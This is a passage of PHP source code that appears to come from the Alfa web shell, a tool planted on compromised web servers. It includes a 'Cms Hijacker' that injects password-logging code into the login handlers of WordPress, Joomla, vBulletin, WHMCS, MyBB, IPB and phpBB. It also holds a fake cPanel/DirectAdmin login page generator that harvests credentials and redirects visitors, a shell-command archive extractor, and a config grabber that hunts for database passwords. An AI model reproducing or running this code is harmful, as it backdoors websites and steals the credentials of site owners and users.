color="green">\'.$zipfile.\'</font></b></p></center>\';\r\n}elseif($GLOBALS[\'sys\']==\'unix\'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx(\'which unzip\')) > 0||strlen(alfaEx(\'which tar\')) > 0||strlen(alfaEx(\'which gunzip\')) > 0)){\r\nswitch ($file_type) {\r\n\tcase \'application/zip\':\r\n\t\talfaEx("cd \'".addslashes($zipfile)."\';unzip \'".addslashes($dirzip)."\'");\r\n\tbreak;\r\n\tcase \'application/x-tar\': case \'application/x-gzip\': case \'application/x-gtar\':\r\n\t\tif(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){\r\n\t\t\talfaEx("cd \'".addslashes($zipfile)."\';tar xzf \'".addslashes($dirzip)."\'");\r\n\t\t}else{\r\n\t\t\talfaEx("cd \'".addslashes($zipfile)."\';gunzip \'".addslashes($dirzip)."\'");\r\n\t\t}\r\n\tbreak;\r\n}\r\necho __pre().\'<center><p>Done -> <b><font color="green">\'.$zipfile.\'</font> <a style="cursor:pointer;" onclick="g(\\\'FilesMan\\\',\\\'\'.$zipfile.\'\\\');">[ View Folder ]</a></b></p></center>\';\r\n}elseif(class_exists(\'ZipArchive\')){\r\n\t$itsok = false;\r\n\tif(emtpy($file_type)){\r\n\t\t$file_type = "application/zip";\r\n\t}\r\n\tswitch ($file_type) {\r\n\t\tcase \'application/zip\':\r\n\t\t\t$zip = new ZipArchive;\r\n\t\t\t$res = $zip->open($dirzip);\r\n\t\t\tif ($res) {\r\n\t\t\t\t$zip->extractTo($zipfile);\r\n\t\t\t\t$zip->close();\r\n\t\t\t\t$itsok = true;\r\n\t\t\t}\r\n\t\tbreak;\r\n\t\tcase \'application/x-tar\': case \'application/x-gzip\': case \'application/x-gtar\':\r\n\t\t\tif(strstr(basename($dirzip), ".tar.gz")){\r\n\t\t\t\t$new_file = $zipfile .\'/\'. basename($dirzip);\r\n\t\t\t\t@copy($dirzip, $new_file);\r\n\t\t\t\t$new_tar = str_replace(".tar.gz", ".tar", $new_file);\r\n\t\t\t\ttry {\r\n\t\t\t\t\t$p = new PharData($new_file);\r\n\t\t\t\t\t$p->decompress();\r\n\t\t\t\t\t$phar = new PharData($new_tar);\r\n\t\t\t\t\t$phar->extractTo($zipfile);\r\n\t\t\t\t\t@unlink($new_file);\r\n\t\t\t\t\t@unlink($new_tar);\r\n\t\t\t\t\t$itsok = true;\r\n\t\t\t\t} catch (Exception $e) {\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\ttry {\r\n\t\t\t\t\t$phar = new PharData($dirzip);\r\n\t\t\t\t\t$phar->extractTo($zipfile);\r\n\t\t\t\t\t$itsok = true;\r\n\t\t\t\t} catch (Exception $e) {\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\tbreak;\r\n\t}\r\nif($itsok){\r\necho __pre().\'<center><p><font color="green">Success...!<br>\'.$zipfile.\'</font> <a style="cursor:pointer;" onclick="g(\\\'FilesMan\\\',\\\'\'.$zipfile.\'\\\');">[ View Folder ]</a></p></center>\';\r\n}else{echo __pre().\'<center><p><font color="red">ERROR!!!...</font></p></center>\';}\r\n}\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfacmshijacker(){\r\nalfahead();\r\nAlfaNum(5,6,7,8,9,10);\r\necho \'<div class=header><br>\r\n<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\\\'cmshijacker\\\',null,this.cmshi.value,this.saveto.value,\\\'>>\\\',this.cmspath.value);return false;" method=\\\'post\\\'>\r\n<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">\';\r\n$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");\r\nforeach($cm_array as $key=>$val)echo \'<option value="\'.$key.\'">\'.$val.\'</option>\';\r\necho("</select>");\r\necho \' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">\r\nSaveTo: <input size="50" type="text" name="saveto" value="\'.$GLOBALS[\'cwd\'].\'alfa.txt"></font>\r\n<input type="submit" name="btn" value=" "></form></center><br>\';\r\n$cms = $_POST[\'alfa1\'];\r\n$saveto = $_POST[\'alfa2\'];\r\n$cmspath = $_POST[\'alfa4\'];\r\nif(!empty($cms) AND !empty($saveto) AND $_POST[\'alfa4\'] AND $_POST[\'alfa3\'] == \'>>\'){\r\necho __pre();\r\nalfaHijackCms($cms,$cmspath,$saveto);\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction alfaHijackCms($cms,$cmspath,$saveto){\r\nswitch($cms){\r\ncase "vb":\r\nhijackvBulletin($cmspath,$saveto);\r\nbreak;\r\ncase "wp":\r\nhijackwp($cmspath,$saveto);\r\nbreak;\r\ncase "jom":\r\nhijackJoomla($cmspath,$saveto);\r\nbreak;\r\ncase "whmcs":\r\nhijackWhmcs($cmspath,$saveto);\r\nbreak;\r\ncase "mybb":\r\nhijackMybb($cmspath,$saveto);\r\nbreak;\r\ncase "ipb":\r\nhijackIPB($cmspath,$saveto);\r\nbreak;\r\ncase "phpbb":\r\nhijackPHPBB($cmspath,$saveto);\r\nbreak;\r\ndefault:\r\necho "error!";\r\nbreak;\r\n}\r\n}\r\nfunction hijackvBulletin($path,$saveto){\r\n$code=\'$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\\\'" . $alfa_username . "\\\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \\\' : \\\' .  $alfa_password." (" . $row["email"] . ")\\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}\';\r\n$clearpw = \'defined(\\\'DISABLE_PASSWORD_CLEARING\\\')\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login = $path."/login.php";\r\n$class = $path."/includes/class_bootstrap.php";\r\n$dologin = \'do_login_redirect();\';\r\n$evil_login = "\\t".$code."\\n\\t".$dologin;\r\n$evil_class = "true";\r\nif((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){\r\n$data_login = @file_get_contents($login);\r\n$data_class = @file_get_contents($class);\r\nif(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){\r\n$login_replace = str_replace($dologin,$evil_login, $data_login);\r\n$class_replace = str_replace($clearpw,$evil_class, $data_class);\r\n@file_put_contents($login, $login_replace);\r\n@file_put_contents($class, $class_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackwp($path,$saveto){\r\n$code = \'$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\\\'log\\\']." : ".$_POST[\\\'pwd\\\']." (".($user->user_email).")\\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);\';\r\n$redirect_wp = \'#if[ ]{0,}\\([ ]{0,}![ ]{0,}is_wp_error\\([ ]{0,}\\$user[ ]{0,}\\)[ ]{0,}&&[ ]{0,}![ ]{0,}\\$reauth[ ]{0,}\\)[ ]{0,}{#\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/wp-login.php";\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(@preg_match($redirect_wp, $data_login, $match)){\r\n$evil_login = "\\t".$match[0]."\\n\\t".$code;\r\n$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackJoomla($path,$saveto){\r\n$code = \'<?php jimport(\\\'joomla.user.authentication\\\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\\\'username\\\'=>$_POST[\\\'username\\\'],\\\'password\\\'=>$_POST[\\\'passwd\\\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\\\'passwd\\\']." ( ".$Alfa_response->email." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$comp=$path."/administrator/components/com_login/";\r\nif(@is_file($comp."/login.php")){\r\n$login = $comp."/login.php";\r\n}elseif(@is_file($comp."/admin.login.php")){\r\n$login = $comp."/admin.login.php";\r\n}else{\r\n$login = \'\';\r\n}\r\nif(@is_file($login) AND @is_writable($login) AND $login != \'\'){\r\n$data_login = @file_get_contents($login);\r\n$evil_login = $code."\\n".$data_login;\r\n@file_put_contents($login, $evil_login);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackWhmcs($path,$saveto){\r\n$code = \'<?php if(isset($_POST[\\\'username\\\']) AND isset($_POST[\\\'password\\\']) AND !empty($_POST[\\\'username\\\']) AND !empty($_POST[\\\'password\\\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\\\'username\\\'];$alfa_pw = @$_POST[\\\'password\\\'];if(isset($_POST[\\\'language\\\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \\\'$alfa_uname\\\' AND `password` = \\\'".md5($alfa_pw)."\\\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \\\'$alfa_uname\\\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\\\':\\\', $row[\\\'password\\\']);$__encPW = md5($__salt[1].$_POST[\\\'password\\\']).\\\':\\\'.$__salt[1];if($row[\\\'password\\\'] == $__encPW){$allow = true;$row[\\\'username\\\'] = $row[\\\'email\\\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\\\'username\\\'] . \\\' : \\\' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \\\'is_admin\\\' : \\\'is_user\\\')."\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$conf=$path."/configuration.php";\r\nif(@is_file($conf) AND @is_writable($conf)){\r\n$data_conf = @file_get_contents($conf);\r\nif(!strstr($data_conf,\'?>\'))$code = \'?>\'.$code;\r\n$evil_conf = $data_conf."\\n".$code;\r\n@file_put_contents($conf, $evil_conf);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackMybb($path,$saveto){\r\n$code = \'$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \\\'".$user[\\\'username\\\']."\\\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\\\'username\\\']." : ". $user[\\\'password\\\']." ( ".$alfa_fetch[\\\'email\\\']." )\\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);\';\r\n$find = \'$loginhandler->complete_login();\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/member.php";\r\n$evil_login = "\\t".$code."\\n\\t".$find;\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(strstr($data_login, $find)){\r\n$login_replace = str_replace($find,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackIPB($path,$saveto){\r\n$code = \'$Alfa_q = $this->DB->buildAndFetch(array(\\\'select\\\' => \\\'email\\\', \\\'from\\\' => \\\'members\\\', \\\'where\\\' => \\\'name="\\\'.$username.\\\'" OR email="\\\'.$email.\\\'"\\\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\\\'ips_username\\\'].\\\' : \\\'.$_POST[\\\'ips_password\\\'].\\\' ( \\\'.$Alfa_q[\\\'email\\\'].\\\' )\\\'."\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);\';\r\n$find = \'unset( $member[\\\'plainPassword\\\'] );\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/admin/sources/handlers/han_login.php";\r\n$evil_login = "\\t".$find."\\n\\t".$code;\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(strstr($data_login, $find)){\r\n$login_replace = str_replace($find,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackPHPBB($path,$saveto){\r\n$code = \'$Alfa_u = request_var(\\\'username\\\', \\\'\\\');$Alfa_p = request_var(\\\'password\\\', \\\'\\\');if($Alfa_u != \\\'\\\' AND $Alfa_p != \\\'\\\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\\\'status\\\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\\\'user_row\\\'][\\\'user_email\\\']." )\\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}\';\r\n$find = \'case \\\'login\\\':\';\r\n$code=str_replace(\'{saveto_path}\',$saveto,$code);\r\n$login=$path."/ucp.php";\r\n$evil_login = "\\t".$find."\\n\\t".$code;\r\nif(@is_file($login) AND @is_writable($login)){\r\n$data_login = @file_get_contents($login);\r\nif(strstr($data_login, $find)){\r\n$login_replace = str_replace($find,$evil_login, $data_login);\r\n@file_put_contents($login, $login_replace);\r\nhijackOutput(0,$saveto);\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}else{\r\nhijackOutput(1);\r\n}\r\n}\r\nfunction hijackOutput($c=0,$p=\'\'){echo($c==0?"<center><font color=\'green\'>Success</font> --> path: $p</center>":\'<center><font color="red">Error in inject code !</font></center>\');}\r\nfunction Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){\r\nif(@is_dir($dir)){\r\n$files=@scandir($dir);\r\nforeach($files as $key => $value){\r\n$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);\r\nif(!@is_dir($path)){\r\nif($ext!=\'*\'){$f = basename($path);$f = explode(\'.\',$f);$f = end($f);if($f!=$ext)continue;}\r\nif($e==\'str\'){\r\n$content = @file_get_contents($path);\r\nif(strpos($content, $string) !== false){\r\necho str_replace(\'\\\\\',\'/\',$path) . "<br>";\r\n}\r\n}else{\r\nif(strstr($value,$string)){\r\necho str_replace(\'\\\\\',\'/\',$path) . "<br>";\r\n}\r\n}\r\n$results[] = $path;\r\n}elseif($value != "." && $value != "..") {\r\nAlfa_StrSearcher($path,$string,$ext,$e,$results);\r\n$results[] = $path;\r\n}}}}\r\nfunction alfafakepage(){\r\n\talfahead();\r\n\tAlfaNum(9,10);\r\n\techo \'<div class=header><br>\r\n\t<center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\\\'fakepage\\\',null,this.clone_page.value,this.fake_root.value,\\\'>>\\\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\\\'post\\\'>\r\n\t<div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">\';\r\n\t$cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");\r\n\tforeach($cm_array as $key=>$val)echo \'<option value="\'.$key.\'">\'.$val.\'</option>\';\r\n\techo("</select></div>");\r\n\techo \'<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>\r\n\t<div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="\'.$_SERVER["DOCUMENT_ROOT"].\'/fake_page_root/"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="\'.$_SERVER["DOCUMENT_ROOT"].\'/index.php"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: \'.$_SERVER["DOCUMENT_ROOT"].\'/wp-login.php"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="\'.$GLOBALS[\'cwd\'].\'logs.txt"></div>\r\n\t<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>\r\n\t<div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>\';\r\n\t$clone_page = $_POST[\'alfa1\'];\r\n\t$fake_root = $_POST[\'alfa2\'];\r\n\t$logto = $_POST[\'alfa4\'];\r\n\t$panel = $_POST[\'alfa5\'];\r\n\t$inject_to = $_POST[\'alfa6\'];\r\n\t$bind_on = $_POST[\'alfa7\'];\r\n\t$count = $_POST[\'alfa8\'];\r\n\tif(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST[\'alfa3\'] == \'>>\'){\r\n\t\techo __pre();\r\n\t\t$target = $clone_page;\r\n\t\t$curl = new AlfaCURL();\r\n\t\t$source_page = $curl->Send($target);\r\n\t\tif(!empty($source_page)){\r\n\t\t\t$matched_form = "";\r\n\t\t\tif($panel == "cpanel"){\r\n\t\t\t\tif(preg_match(\'#<form(.*)id="login_form"(.*)>#\', $source_page, $match)){\r\n\t\t\t\t\t$matched_form = $match[0];\r\n\t\t\t\t}\r\n\t\t\t}else{\r\n\t\t\t\tif(preg_match(\'#<form(.*?)>#\', $source_page, $match)){\r\n\t\t\t\t\t$matched_form = $match[0];\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif(!empty($matched_form)){\r\n\t\t\t\t$fake = "";\r\n\t\t\t\t$pwd = str_replace($_SERVER["DOCUMENT_ROOT"], \'\', $fake_root);\r\n\t\t\t\t$uri = str_replace($_SERVER["DOCUMENT_ROOT"], \'\', $inject_to);\r\n\t\t\t\tif($panel == "cpanel"){\r\n\t\t\t\t\t$port = "2083";\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$target = str_replace(array("http://", "https://"), "", $target);\r\n\t\t\t\t\t$port = explode(":",$target);\r\n\t\t\t\t\t$port = $port[1];\r\n\t\t\t\t}\r\n\t\t\t\tif(substr($uri, 0, 1) == "/"){\r\n\t\t\t\t\t$uri = substr($uri, 1);\r\n\t\t\t\t}\r\n\t\t\t\t$uri = $_SERVER["HTTP_ORIGIN"] . \'/\' . str_replace("index.php", "", $uri) . \'?:\' . $port;\r\n\t\t\t\t$log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . \'/log.php\';\r\n\t\t\t\tif($panel == "cpanel"){\r\n\t\t\t\t\t$form = \'<form novalidate id="login_form" action="\'.$log_url.\'" method="post" target="_top" style="visibility:">\';\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$form = \'<form action="\'.$log_url.\'" method="post">\';\r\n\t\t\t\t}\r\n\t\t\t\t$fake = str_replace($matched_form, $form, $source_page);\r\n\t\t\t\tif(@!is_dir($fake_root)){\r\n\t\t\t\t\t@mkdir($fake_root, 0777, true);\r\n\t\t\t\t}\r\n\r\n\t\t\t\t$cookie_name = "alfa_fakepage_counter" . rand(9999,99999);\r\n\r\n\t\t\t\t$post_user = \'user\';\r\n\t\t\t\t$post_pass = \'pass\';\r\n\t\t\t\t$resp_code = \'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}\';\r\n\t\t\t\tif($panel != "cpanel"){\r\n\t\t\t\t\t$post_user = \'username\';\r\n\t\t\t\t\t$post_pass = \'password\';\r\n\t\t\t\t\t$resp_code = \'@header("Location: ".$_SERVER[\\\'HTTP_REFERER\\\']);\';\r\n\t\t\t\t}\r\n\r\n\t\t\t\t$cpanel_log = \'<?php $cook_time = time()+(86400 * 7); $user = $_POST["\'.$post_user.\'"];$pass = $_POST["\'.$post_pass.\'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["\'.$cookie_name.\'"])){@setcookie("\'.$cookie_name.\'", 0, $cook_time, "/");$_COOKIE["\'.$cookie_name.\'"]=1;}if((int)$_COOKIE["\'.$cookie_name.\'"]>\'.$count.\'){@header("Location: /");exit;}@setcookie("\'.$cookie_name.\'", ((int)$_COOKIE["\'.$cookie_name.\'"] + 1), $cook_time, "/");$fp = @fopen("\'.$logto.\'", "a+");@fwrite($fp, $user . " : " . $pass . "\\n");fclose($fp);sleep(3);\'.$resp_code.\'exit;}?>\';\r\n\r\n\t\t\t\t@file_put_contents($fake_root.\'/log.php\', $cpanel_log);\r\n\r\n\t\t\t\tif($panel == "cpanel"){\r\n\t\t\t\t\t$fake = preg_replace(array(\'#<link(.*)href="(.*)"(.*)>#\', \'#<img class="main-logo" src="(.*)"(.*)>#\', \'# <a(.*)id="reset_password">#\'), array(\'<link href="\'.$target.\'/$2">\', \'<img class="main-logo" src="\'.$target.\'/$1" alt="logo" />\', \'<a href="#" id="reset_password">\'), $fake);\r\n\t\t\t\t}\r\n\r\n\t\t\t\t@file_put_contents($fake_root.\'/index.php\', $fake);\r\n\r\n\t\t\t\t$inject_code = \'<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["\'.$cookie_name.\'"]<\'.$count.\'){@include("\'.$fake_root.\'/index.php");exit;}?>\';\r\n\t\t\t\t$bind_on_code = \'<?php if((int)$_COOKIE["\'.$cookie_name.\'"]<\'.$count.\'){@header("Location: \'.$uri.\'");exit;}?>\';\r\n\r\n\t\t\t\t@file_put_contents($inject_to, $inject_code . "\\n" .@file_get_contents($inject_to));\r\n\t\t\t\t@file_put_contents($bind_on, $bind_on_code . "\\n" .@file_get_contents($bind_on));\r\n\r\n\t\t\t\techo "success...!";\r\n\t\t\t}else{\r\n\t\t\t\techo "failed...!";\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\techo("<div style=\'text-align:center;color:red;\'>Cannot open the target...!</div>");\r\n\t\t}\r\n\t}\r\n\techo \'</div>\';\r\n\talfafooter();\r\n}\r\nfunction alfaarchive_manager(){\r\n\talfahead();\r\n\t$file = $_POST[\'alfa2\'];\r\n\tif(!file_exists($file)){\r\n\t\t$file = $GLOBALS[\'cwd\'];\r\n\t}\r\n\t$rand_id = rand(9999, 999999);\r\n\techo \'<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>\';\r\n\techo \'<form name="srch" onSubmit="g(\\\'archive_manager\\\',null,null,this.file.value,null,null,\\\'>>\\\');return false;" method=\\\'post\\\'>\r\n\t<div class="txtfont">\r\n\tArchive file: <input size="50" id="target" type="text" name="file" value="\'.$file.\'">\r\n\t<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n\tif($_POST[\'alfa5\']==\'>>\'){\r\n\t\t//echo __pre();\r\n\t\techo \'<hr><div style="margin-left: 12px;" archive_full="phar://\'.$file.\'" archive_name="\'.basename($file).\'" id="archive_dir_\'.$rand_id.\'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>\';\r\n\t\techo \'<div style="padding: 10px;" id="archive_base_\'.$rand_id.\'">\';\r\n\t\t__alfa_open_archive_file($file, $rand_id);\r\n\t\techo \'</div>\';\r\n\t}\r\n\techo \'</div>\';\r\n\talfafooter();\r\n}\r\nfunction __alfa_open_archive_file($arch, $base_id=0){\r\n\ttry{\r\n\t\t$files = array();\r\n\t\t$dirs = array();\r\n\t\t$archive = new PharData($arch);\r\n\t\t foreach($archive as $file) {\r\n\t\t\t $file_modify = @date(\'Y-m-d H:i:s\', @filemtime($file->getPathname()));\r\n\t\t     if($file->isDir()) {\r\n\t\t\t\t $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);\r\n\t\t     }else{\r\n\t\t\t\t $file_size = @filesize($file->getPathname());\r\n\t\t\t\t $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file",  "modify" => $file_modify, "size" => $file_size);\r\n\t\t\t }\r\n\t\t }\r\n\t\t function __alfa_open_archive_usort($a, $b){\r\n\t\t\t return strcmp(strtolower($a[\'name\']), strtolower($b[\'name\']))*1;\r\n\t\t }\r\n\t\t usort($dirs, "__alfa_open_archive_usort");\r\n\t\t usort($files, "__alfa_open_archive_usort");\r\n\t\t $files = array_merge($dirs, $files);\r\n\t\t echo \'<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>\';\r\n\t\t $icon = \'<img class="archive-icons" src="\'.findicon(\'..\',\'dir\').\'" width="30" height="30">\';\r\n\t\t echo \'<tr><th><a base_id="\'.$base_id.\'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="\'.dirname($arch.\'.php\').\'">\'.$icon.\'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>\';\r\n\t\t foreach($files as $file){\r\n\t\t\t $icon = \'<img class="archive-icons" src="\'.findicon($file[\'name\'],$file[\'type\']).\'" width="30" height="30">\';\r\n\t\t\t if($file["type"] == "dir"){\r\n\t\t\t \techo \'<tr><th><a base_id="\'.$base_id.\'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="\'.$file["path"].\'" fname="\'.$file["name"].\'">\'.$icon.\'<span class="archive-name archive-type-dir">| \'.$file["name"].\' |</span></a><td>dir</td><td>\'.$file["modify"].\'</td><td>-</td></tr>\';\r\n\t\t \t}else{\r\n\t\t\t\techo "<tr><th><a base_id=\'".$base_id."\' class=\'archive-file-row\' onclick=\\"editor(\'".$file["path"]."\',\'auto\',\'\',\'\',\'\',\'file\');\\">".$icon."<span class=\'archive-name archive-type-file\' fname=\'".$file["name"]."\'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";\r\n\r\n\t\t\t}\r\n\t\t }\r\n\t\t  echo \'</table>\';\r\n\t}catch(Exception $e){\r\n\t\techo("0");\r\n\t}\r\n}\r\nfunction alfaopen_archive_dir(){\r\n\t$dir = $_POST["alfa1"];\r\n\t$base_id = $_POST["alfa2"];\r\n\t__alfa_open_archive_file($dir, $base_id);\r\n}\r\nfunction alfaconfig_grabber(){\r\n\talfahead();\r\n\techo \'<div class=header><center><p><div class="txtfont_header">| Config Grabber |</div></p>\';\r\n\techo \'<form name="srch" onSubmit="g(\\\'config_grabber\\\',null,null,this.dir.value,this.ext.value,null,\\\'>>\\\');return false;" method=\\\'post\\\'>\r\n\t<div class="txtfont">\r\n\tDir: <input size="50" id="target" type="text" name="dir" value="\'.$GLOBALS[\'cwd\'].\'">\r\n\tExt: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">\r\n\t<input type="submit" name="btn" value=" "></div></form></center><br>\';\r\n\t$dir = $_POST[\'alfa2\'];\r\n\t$ext = $_POST[\'alfa3\'];\r\n\tif($_POST[\'alfa5\']==\'>>\'){\r\n\t\techo __pre();\r\n\t\tAlfa_ConfigGrabber($dir, $ext);\r\n\t}\r\n\techo \'</div>\';\r\n\talfafooter();\r\n}\r\nfunction Alfa_ConfigGrabber($dir, $ext) {\r\n\t$pattern = "#define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOST(?:\'|\\")[ ]{0,}|define[ ]{0,}\\([ ]{0,}(?:\'|\\")DB_HOSTNAME(?:\'|\\")[ ]{0,}|config\\[(?:\'|\\")MasterServer(?:\'|\\")\\]\\[(?:\'|\\")password(?:\'|\\")\\]|(?:\'|\\")database(?:\'|\\")[ ]{0,}=>[ ]{0,}(?:\'|\\")(.*?)(?:\'|\\")|(?:\'|\\")(mysql|database)(?:\'|\\")[ ]{0,}=>[ 